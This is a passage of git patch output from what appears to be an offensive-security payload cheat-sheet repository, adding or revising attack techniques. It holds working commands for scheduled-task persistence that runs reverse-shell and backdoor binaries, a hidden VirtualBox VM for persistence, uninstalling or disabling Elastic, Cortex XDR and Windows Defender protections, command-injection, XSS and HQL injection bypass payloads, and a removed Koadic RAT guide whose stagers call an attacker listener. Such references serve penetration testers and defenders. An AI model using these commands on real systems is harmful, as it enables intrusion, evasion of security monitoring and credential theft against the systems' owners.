+    GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45UZXyuYB[...]G2/M= # requires LDAP access
+    GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45U[...]SM0R7djG2/M= --pwdid AQAAA[..]AAA # Offline mode
+    ```
+
 ### Pass-the-Ticket Golden Tickets
 
 Forging a TGT require the `krbtgt` NTLM hash
@@ -3555,3 +3585,4 @@ CME          10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
 * [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/)
 * [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/)
 * [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/)
+* [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/)
\ No newline at end of file
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index e6a93a08..eb5f1353 100644
--- a/Methodology and Resources/Windows - Persistence.md	
+++ b/Methodology and Resources/Windows - Persistence.md	
@@ -146,36 +146,38 @@ SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -
 
 ### Scheduled Tasks User
 
-Using native **schtask**
+* Using native **schtask** - Create a new task
+    ```powershell
+    # Create the scheduled tasks to run once at 00.00
+    schtasks /create /sc ONCE /st 00:00 /tn "Device-Synchronize" /tr C:\Temp\revshell.exe
+    # Force run it now !
+    schtasks /run /tn "Device-Synchronize"
+    ```
+* Using native **schtask** - Leverage the `schtasks /change` command to modify existing scheduled tasks
+    ```powershell
+    # Launch an executable by calling the ShellExec_RunDLL function.
+    SCHTASKS /Change /tn "\Microsoft\Windows\PLA\Server Manager Performance Monitor" /TR "C:\windows\system32\rundll32.exe SHELL32.DLL,ShellExec_RunDLLA C:\windows\system32\msiexec.exe /Z c:\programdata\S-1-5-18.dat" /RL HIGHEST /RU "" /ENABLE
+    ```
 
-```powershell
-# Create the scheduled tasks to run once at 00.00
-schtasks /create /sc ONCE /st 00:00 /tn "Device-Synchronize" /tr C:\Temp\revshell.exe
-# Force run it now !
-schtasks /run /tn "Device-Synchronize"
-```
+* Using Powershell
+    ```powershell
+    PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
+    PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
+    PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"
+    PS C:\> $S = New-ScheduledTaskSettingsSet
+    PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
+    PS C:\> Register-ScheduledTask Backdoor -InputObject $D
+    ```
 
-Using Powershell
+* Using SharPersist
+    ```powershell
+    # Add to a current scheduled task
+    SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
 
-```powershell
-PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
-PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
-PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"
-PS C:\> $S = New-ScheduledTaskSettingsSet
-PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
-PS C:\> Register-ScheduledTask Backdoor -InputObject $D
-```
-
-Using SharPersist
-
-```powershell
-# Add to a current scheduled task
-SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
-
-# Add new task
-SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add
-SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
-```
+    # Add new task
+    SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add
+    SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
+    ```
 
 
 ### BITS Jobs

From df8493e4e67fedfa8059721563d8220abebd4195 Mon Sep 17 00:00:00 2001
From: nerrorsec <42860825+nerrorsec@users.noreply.github.com>
Date: Thu, 24 Mar 2022 11:54:34 +0545
Subject: [PATCH 08/20] import os

---
 Insecure Deserialization/Python.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Insecure Deserialization/Python.md b/Insecure Deserialization/Python.md
index 41887f65..98e843e7 100644
--- a/Insecure Deserialization/Python.md	
+++ b/Insecure Deserialization/Python.md	
@@ -32,7 +32,7 @@ Python 2.7 documentation clearly states Pickle should never be used with untrust
 > The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
 
 ```python
-import cPickle
+import cPickle, os
 from base64 import b64encode, b64decode
 
 class Evil(object):
@@ -47,4 +47,4 @@ print("Your Evil Token : {}").format(evil_token)
 ## References
 
 * [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)
-* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)
\ No newline at end of file
+* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)

From 89f0b93d43954bcc3858aaae306b392d33b9a4a1 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 27 Mar 2022 19:50:33 +0200
Subject: [PATCH 09/20] Elastic EDR + VM Persistence

---
 .../MSSQL Server - Cheatsheet.md              |  1 +
 .../Windows - Persistence.md                  | 57 +++++++++++++++++++
 Upload Insecure Files/README.md               | 22 +++----
 3 files changed, 69 insertions(+), 11 deletions(-)

diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md
index cfd9e9cb..860d5b0f 100644
--- a/Methodology and Resources/MSSQL Server - Cheatsheet.md	
+++ b/Methodology and Resources/MSSQL Server - Cheatsheet.md	
@@ -444,6 +444,7 @@ EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1';
 
 ```ps1
 SELECT job_id, [name] FROM msdb.dbo.sysjobs;
+SELECT job.job_id, notify_level_email, name, enabled, description, step_name, command, server, database_name FROM msdb.dbo.sysjobs job INNER JOIN msdb.dbo.sysjobsteps steps ON job.job_id = steps.job_id
 Get-SQLAgentJob -Instance "<DBSERVERNAME\DBInstance>" -username sa -Password Password1234 -Verbose
 ```
 
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index eb5f1353..a95bd6f2 100644
--- a/Methodology and Resources/Windows - Persistence.md	
+++ b/Methodology and Resources/Windows - Persistence.md	
@@ -32,6 +32,7 @@
         * [sethc.exe](#sethc.exe)
     * [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing)
     * [Skeleton Key](#skeleton-key)
+    * [Virtual Machines](#virtual-machines)
 * [Domain](#domain)
     * [Golden Certificate](#golden-certificate)
     * [Golden Ticket](#golden-ticket)
@@ -56,6 +57,13 @@ PS> attrib +h mimikatz.exe
 
 * [Sophos Removal Tool.ps1](https://github.com/ayeskatalas/Sophos-Removal-Tool/)
 * [Symantec CleanWipe](https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.html)
+* [Elastic EDR/Security](https://www.elastic.co/guide/en/fleet/current/uninstall-elastic-agent.html)
+    ```ps1
+    cd "C:\Program Files\Elastic\Agent\"
+    PS C:\Program Files\Elastic\Agent> .\elastic-agent.exe uninstall
+    Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y
+    Elastic Agent has been uninstalled.
+    ```
 
 ### Disable Windows Defender
 
@@ -403,6 +411,54 @@ Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DC
 Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\Administrator
 ```
 
+
+### Virtual Machines
+
+> Based on the Shadow Bunny technique.
+
+```ps1
+# download virtualbox
+Invoke-WebRequest "https://download.virtualbox.org/virtualbox/6.1.8/VirtualBox-6.1.8-137981-Win.exe" -OutFile $env:TEMP\VirtualBox-6.1.8-137981-Win.exe
+
+# perform a silent install and avoid creating desktop and quick launch icons
+VirtualBox-6.0.14-133895-Win.exe --silent --ignore-reboot --msiparams VBOX_INSTALLDESKTOPSHORTCUT=0,VBOX_INSTALLQUICKLAUNCHSHORTCUT=0
+
+# in \Program Files\Oracle\VirtualBox\VBoxManage.exe
+# Disabling notifications
+.\VBoxManage.exe setextradata global GUI/SuppressMessages "all" 
+
+# Download the Virtual machine disk
+Copy-Item \\smbserver\images\shadowbunny.vhd $env:USERPROFILE\VirtualBox\IT Recovery\shadowbunny.vhd
+
+# Create a new VM
+$vmname = "IT Recovery"
+.\VBoxManage.exe createvm --name $vmname --ostype "Ubuntu" --register
+
+# Add a network card in NAT mode
+.\VBoxManage.exe modifyvm $vmname --ioapic on  # required for 64bit
+.\VBoxManage.exe modifyvm $vmname --memory 1024 --vram 128
+.\VBoxManage.exe modifyvm $vmname --nic1 nat
+.\VBoxManage.exe modifyvm $vmname --audio none
+.\VBoxManage.exe modifyvm $vmname --graphicscontroller vmsvga
+.\VBoxManage.exe modifyvm $vmname --description "Shadowbunny"
+
+# Mount the VHD file
+.\VBoxManage.exe storagectl $vmname -name "SATA Controller" -add sata
+.\VBoxManage.exe storageattach $vmname -comment "Shadowbunny Disk" -storagectl "SATA Controller" -type hdd -medium "$env:USERPROFILE\VirtualBox VMs\IT Recovery\shadowbunny.vhd" -port 0
+
+# Start the VM
+.\VBoxManage.exe startvm $vmname –type headless 
+
+
+# optional - adding a shared folder
+# require: VirtualBox Guest Additions
+.\VBoxManage.exe sharedfolder add $vmname -name shadow_c -hostpath c:\ -automount
+# then mount the folder in the VM
+sudo mkdir /mnt/c
+sudo mount -t vboxsf shadow_c /mnt/c
+```
+
+
 ## Domain
 
 ### User Certificate
@@ -464,3 +520,4 @@ kerberos::tgt
 * [Persistence – Image File Execution Options Injection - @netbiosX](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/)
 * [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/)
 * [Golden Certificate - NOVEMBER 15, 2021](https://pentestlab.blog/2021/11/15/golden-certificate/)
+* [Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi](https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/)
\ No newline at end of file
diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md
index e5593850..0c633a0b 100644
--- a/Upload Insecure Files/README.md	
+++ b/Upload Insecure Files/README.md	
@@ -1,13 +1,12 @@
 # Upload
 
-Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
+> Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
 
 ## Summary
 
 * [Tools](#tools)
 * [Exploits](#exploits)
-    * [Defaults extensions](#defaults-extension)
-    * [Other extensions](#other-extensions)
+    * [Defaults extensions](#defaults-extensions)
     * [Upload tricks](#upload-tricks)
     * [Filename vulnerabilities](#filename-vulnerabilities)
     * [Picture upload with LFI](#picture-upload-with-lfi)
@@ -53,18 +52,19 @@ Uploaded files may pose a significant risk if not handled correctly. A remote at
 
 - Use double extensions : `.jpg.php`
 - Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg`
-- Mix uppercase and lowercase : `.pHp, .pHP5, .PhAr`
+- Random uppercase and lowercase : `.pHp, .pHP5, .PhAr`
 - Null byte (works well against `pathinfo()`)
-    * .php%00.gif
-    * .php\x00.gif
-    * .php%00.png
-    * .php\x00.png
-    * .php%00.jpg
-    * .php\x00.jpg
+    * `.php%00.gif`
+    * `.php\x00.gif`
+    * `.php%00.png`
+    * `.php\x00.png`
+    * `.php%00.jpg`
+    * `.php\x00.jpg`
 - Special characters
     * Multiple dots : `file.php......` , in Windows when a file is created with dots at the end those will be removed.
-    * Whitespace characters: `file.php%20`
+    * Whitespace characters: `file.php%20`, `file.php%0d%0a.jpg`
     * Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
+    * Slash: `file.php/`, `file.php.\`
 - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
     * `Content-Type : image/gif`
     * `Content-Type : image/png`

From 8a5e01f20dcdb7975aaee92cd25131b248fbd661 Mon Sep 17 00:00:00 2001
From: xplo1t-sec <lizu036@gmail.com>
Date: Wed, 30 Mar 2022 03:13:18 -0400
Subject: [PATCH 10/20] added new bypass

---
 Command Injection/README.md | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/Command Injection/README.md b/Command Injection/README.md
index 9df048ad..9b66cc21 100644
--- a/Command Injection/README.md	
+++ b/Command Injection/README.md	
@@ -18,6 +18,7 @@
    * [Bypass with double quote](#bypass-with-double-quote)
    * [Bypass with backslash and slash](#bypass-with-backslash-and-slash)
    * [Bypass with $@](#bypass-with-)
+   * [Bypass with $()](#bypass-with-$())
    * [Bypass with variable expansion](#bypass-with-variable-expansion)
    * [Bypass with wildcards](#bypass-with-wildcards)
 * [Challenge](#challenge)
@@ -209,6 +210,12 @@ echo $0
 echo whoami|$0
 ```
 
+### Bypass with $()
+```powershell
+who$()ami
+who$(echo am)i
+```
+
 #### Bypass with variable expansion
 
 ```powershell

From 4d8a45db5a9164c4a0e60ffc645586c621541893 Mon Sep 17 00:00:00 2001
From: xplo1t-sec <lizu036@gmail.com>
Date: Wed, 30 Mar 2022 03:14:41 -0400
Subject: [PATCH 11/20] added new bypass

---
 Command Injection/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Command Injection/README.md b/Command Injection/README.md
index 9b66cc21..5fdd66ac 100644
--- a/Command Injection/README.md	
+++ b/Command Injection/README.md	
@@ -18,7 +18,7 @@
    * [Bypass with double quote](#bypass-with-double-quote)
    * [Bypass with backslash and slash](#bypass-with-backslash-and-slash)
    * [Bypass with $@](#bypass-with-)
-   * [Bypass with $()](#bypass-with-$())
+   * [Bypass with $()](#bypass-with--1)
    * [Bypass with variable expansion](#bypass-with-variable-expansion)
    * [Bypass with wildcards](#bypass-with-wildcards)
 * [Challenge](#challenge)

From c885e7696744e28c4fa203982b6ee3f0a6a321ac Mon Sep 17 00:00:00 2001
From: xplo1t-sec <lizu036@gmail.com>
Date: Wed, 30 Mar 2022 03:16:37 -0400
Subject: [PATCH 12/20] added new bypass

---
 Command Injection/README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/Command Injection/README.md b/Command Injection/README.md
index 5fdd66ac..e98534ae 100644
--- a/Command Injection/README.md	
+++ b/Command Injection/README.md	
@@ -214,6 +214,7 @@ echo whoami|$0
 ```powershell
 who$()ami
 who$(echo am)i
+who`echo am`i
 ```
 
 #### Bypass with variable expansion

From 39d1c6e7d81d4b2c492d98c21c2b1c5d1c8cadc4 Mon Sep 17 00:00:00 2001
From: Ooggle <33269056+Ooggle@users.noreply.github.com>
Date: Sat, 9 Apr 2022 12:55:21 +0200
Subject: [PATCH 13/20] Add document blacklist bypass

---
 XSS Injection/README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index f17abf32..5dee5d67 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -725,6 +725,7 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
 
 ```javascript
 <div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
+window["doc"+"ument"]
 ```
 
 ### Bypass using javascript inside a string

From b0d05faded8f0e7b8fa0cab98f503a2178fda18b Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Thu, 14 Apr 2022 09:42:15 +0200
Subject: [PATCH 14/20] TruffleHog examples + Cortex XDR disable

---
 API Key Leaks/README.md                       |   7 +
 .../Windows - Persistence.md                  |  40 +++++-
 .../Windows - Post Exploitation Koadic.md     | 123 ------------------
 Server Side Request Forgery/README.md         |   6 +
 4 files changed, 49 insertions(+), 127 deletions(-)
 delete mode 100644 Methodology and Resources/Windows - Post Exploitation Koadic.md

diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md
index acfb662e..8438d2c4 100644
--- a/API Key Leaks/README.md	
+++ b/API Key Leaks/README.md	
@@ -25,6 +25,13 @@
 
 - [KeyFinder - is a tool that let you find keys while surfing the web!](https://github.com/momenbasel/KeyFinder)
 - [Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks)
+- [truffleHog - Find credentials all over the place](https://github.com/trufflesecurity/truffleHog)
+    ```ps1
+    docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys
+    docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity
+    trufflehog git https://github.com/trufflesecurity/trufflehog.git
+    trufflehog github --endpoint https://api.github.com --org trufflesecurity --token GITHUB_TOKEN --debug --concurrency 2
+    ```
 
 ## Exploit
 
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index a95bd6f2..8154ab57 100644
--- a/Methodology and Resources/Windows - Persistence.md	
+++ b/Methodology and Resources/Windows - Persistence.md	
@@ -64,6 +64,27 @@ PS> attrib +h mimikatz.exe
     Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y
     Elastic Agent has been uninstalled.
     ```
+* [Cortex XDR](https://mrd0x.com/cortex-xdr-analysis-and-bypass/)
+    ```ps1
+    # Global uninstall password: Password1
+    Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db
+    Look for PasswordHash, PasswordSalt or password, salt strings.
+
+    # Disable Cortex: Change the DLL to a random value, then REBOOT
+    reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d nothing.dll /f
+
+    # Disables the agent on startup (requires reboot to work)
+    cytool.exe startup disable
+
+    # Disables protection on Cortex XDR files, processes, registry and services
+    cytool.exe protect disable
+
+    # Disables Cortex XDR (Even with tamper protection enabled)
+    cytool.exe runtime disable
+
+    # Disables event collection
+    cytool.exe event_collection disable
+    ```
 
 ### Disable Windows Defender
 
@@ -73,19 +94,30 @@ sc config WinDefend start= disabled
 sc stop WinDefend
 Set-MpPreference -DisableRealtimeMonitoring $true
 
-# Wipe currently stored definitions
-# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>
-MpCmdRun.exe -RemoveDefinitions -All
-
 ## Exclude a process / location
 Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
 Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
 Add-MpPreference -ExclusionPath C:\Video, C:\install
 
+# Disable scanning all downloaded files and attachments, disable AMSI (reactive)
+PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
+PS C:\> Set-MpPreference -DisableIOAVProtection $true
+# Disable AMSI (set to 0 to enable)
+PS C:\> Set-MpPreference -DisableScriptScanning 1 
+
 # Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions
 reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
+
+# Wipe currently stored definitions
+# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>
+MpCmdRun.exe -RemoveDefinitions -All
+
+# Remove signatures (if Internet connection is present, they will be downloaded again):
+PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
+PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
 ```
 
+
 ### Disable Windows Firewall
 
 ```powershell
diff --git a/Methodology and Resources/Windows - Post Exploitation Koadic.md b/Methodology and Resources/Windows - Post Exploitation Koadic.md
deleted file mode 100644
index 9caea726..00000000
--- a/Methodology and Resources/Windows - Post Exploitation Koadic.md	
+++ /dev/null
@@ -1,123 +0,0 @@
-# Koadic C3 COM Command & Control - JScript RAT
-
-> Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire.
-
-## Installation
-
-```powershell
-git clone https://github.com/zerosum0x0/koadic
-git submodule init
-git submodule update
-pip2.7 install -r requirements.txt --user
-python2.7 koadic
-```
-
-## Set a listener
-
-```powershell
-use stager/js/mshta
-set LHOST 192.168.1.19
-set SRVPORT 4444
-run
-
-[>] mshta http://192.168.1.19:4444/6DX7f
-```
-
-```powershell
-use stager/js/wmic
-set LHOST 192.168.1.19
-set SRVPORT 4444
-run
-
-[>] wmic os get /FORMAT:"http://192.168.1.19:4444/lQGx5.xsl"
-```
-
-### Stagers
-
-Stagers hook target zombies and allow you to use implants.
-
-Module | Description
---------|------------
-stager/js/mshta | serves payloads using MSHTA.exe HTML Applications
-stager/js/regsvr | serves payloads using regsvr32.exe COM+ scriptlets
-stager/js/wmic | serves payloads using WMIC XSL
-stager/js/rundll32_js | serves payloads using rundll32.exe
-stager/js/disk | serves payloads using files on disk
-
-
-
-## List zombies and interact with them
-
-```powershell
-(koadic: sta/js/wmic)$ zombies
-
-        ID   IP              STATUS  LAST SEEN
-        ---  ---------       ------- ------------
-        0    192.168.1.30    Alive   2018-10-04 17:07:12
-
-(koadic: sta/js/wmic)$ zombies 0
-        ID:                     0
-        Status:                 Alive
-        First Seen:             2018-10-04 17:05:00
-        Last Seen:              2018-10-04 17:14:42
-        IP:                     192.168.1.30
-        User:                   DESKTOP-68URA9U\CrashWin
-        [...]
-        Elevated:               No
-        [...]
-```
-
-Interact with `zombies zombie_id`, get a shell with `cmdshell zombie_id`.
-
-```powershell
-[koadic: ZOMBIE 0 (192.168.1.30) - C:\Users\CrashWin]> whoami
-[*] Zombie 0: Job 1 (implant/manage/exec_cmd) created.
-[+] Zombie 0: Job 1 (implant/manage/exec_cmd) completed.
-Result for `cd C:\Users\CrashWin & whoami`:
-desktop-68ura9u\crashwin
-```
-
-## Use an implant
-
-Select an implant with `use module`, then fill the `info` with `set INFO value`, finally start the module with `run`.
-
-```powershell
-(koadic: sta/js/mshta)$ use implant/phish/password_box
-(koadic: imp/phi/password_box)$ set ZOMBIE 1
-(koadic: imp/phi/password_box)$ run
-Input contents:
-MyStrongPassword123!
-```
-
-### Implants
-
-Implants start jobs on zombies.
-
-Module | Description
---------|------------
-implant/elevate/bypassuac_eventvwr | Uses enigma0x3's eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.
-implant/elevate/bypassuac_sdclt | Uses enigma0x3's sdclt.exe exploit to bypass UAC on Windows 10.
-implant/fun/zombie | Maxes volume and opens The Cranberries YouTube in a hidden window.
-implant/fun/voice | Plays a message over text-to-speech.
-implant/gather/clipboard | Retrieves the current content of the user clipboard.
-implant/gather/enum_domain_info | Retrieve information about the Windows domain.
-implant/gather/hashdump_sam | Retrieves hashed passwords from the SAM hive.
-implant/gather/hashdump_dc | Domain controller hashes from the NTDS.dit file.
-implant/gather/user_hunter | Locate users logged on to domain computers (using Dynamic Wrapper X).
-implant/inject/mimikatz_dynwrapx | Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).
-implant/inject/mimikatz_dotnet2js | Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).
-implant/inject/shellcode_excel | Runs arbitrary shellcode payload (if Excel is installed).
-implant/manage/enable_rdesktop | Enables remote desktop on the target.
-implant/manage/exec_cmd | Run an arbitrary command on the target, and optionally receive the output.
-implant/phishing/password_box | Prompt a user to enter their password.
-implant/pivot/stage_wmi | Hook a zombie on another machine using WMI.
-implant/pivot/exec_psexec | Run a command on another machine using psexec from sysinternals.
-implant/scan/tcp | Uses HTTP to scan open TCP ports on the target zombie LAN.
-implant/utils/download_file | Downloads a file from the target zombie.
-implant/utils/multi_module | Run a number of implants in succession.
-implant/utils/upload_file | Uploads a file from the listening server to the target zombies.
-
-## References
-
-- [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/)
-- [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic)
\ No newline at end of file
diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index ed8dd5ca..a16cb7d8 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -223,6 +223,12 @@ List:
 ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
 ```
 
+### Bypass using unicode
+
+In some languages (.NET, Python 3) regex supports unicode by default.
+`\d` includes `0123456789` but also `๐๑๒๓๔๕๖๗๘๙`.
+
+
 ### Bypass filter_var() php function
 
 ```powershell

From 1f73834d5e561581839d0f3279b8e1b81d6e60a7 Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Thu, 14 Apr 2022 18:07:35 +0200
Subject: [PATCH 15/20] HQLi in Java apps - HITBSecConf2016

---
 SQL Injection/HQL Injection.md | 104 +++++++++++++++++++++++++++++++++
 1 file changed, 104 insertions(+)

diff --git a/SQL Injection/HQL Injection.md b/SQL Injection/HQL Injection.md
index 6e8168be..97d36723 100644
--- a/SQL Injection/HQL Injection.md	
+++ b/SQL Injection/HQL Injection.md	
@@ -1,11 +1,18 @@
 # Hibernate Query Language Injection 
 
 > Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia
+
 ## Summary
 
 * [HQL Comments](#hql-comments)
 * [HQL List Columns](#hql-list-columns)
 * [HQL Error Based](#hql-error-based)
+* [Single Quote Escaping](#single-quote-escaping)
+* [$-quoted strings](#--quoted-strings)
+* [DBMS Magic functions](#dbms-magic-functions)
+* [Unicode](#unicode)
+* [Java constants](#java-constants)
+* [Methods by DBMS](#methods-by-dbms)
 * [References](#references)
 
 ## HQL Comments
@@ -49,10 +56,107 @@ select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.pro
 
 :warning: **HQL does not support UNION queries**
 
+## Single Quote Escaping
+
+Method works for MySQL DBMS which escapes SINGLE QUOTES in strings with SLASH `\'`.
+
+In HQL SINGLE QUOTES is escaped in strings by doubling `''`.
+
+```
+'abc\''or 1=(select 1)--'
+```
+
+In HQL it is a string, in MySQL it is a string and additional SQL expression.
+
+## $-quoted strings
+
+Method works for DBMS which allow DOLLAR-QUOTED strings in SQL expressions: PostgreSQL, H2.
+
+Hibernate ORM allows identifiers starting with `$$`.
+
+```
+$$='$$=concat(chr(61),chr(39)) and 1=1--'
+```
+
+## DBMS Magic functions
+
+Method works for DBMS which have MAGIC FUNCTIONS which evaluate SQL expression in string parameter: PostgreSQL, Oracle.
+
+Hibernate allows to specify any function name in HQL expression.
+
+PostgreSQL has built-in function `query_to_xml('Arbitrary SQL')`.
+
+```
+array_upper(xpath('row',query_to_xml('select 1 where 1337>1', true, false,'')),1)
+```
+
+Oracle has built-in function `DBMS_XMLGEN.getxml('SQL')`
+
+```
+NVL(TO_CHAR(DBMS_XMLGEN.getxml('select 1 where 1337>1')),'1')!='1'
+```
+
+## Unicode
+
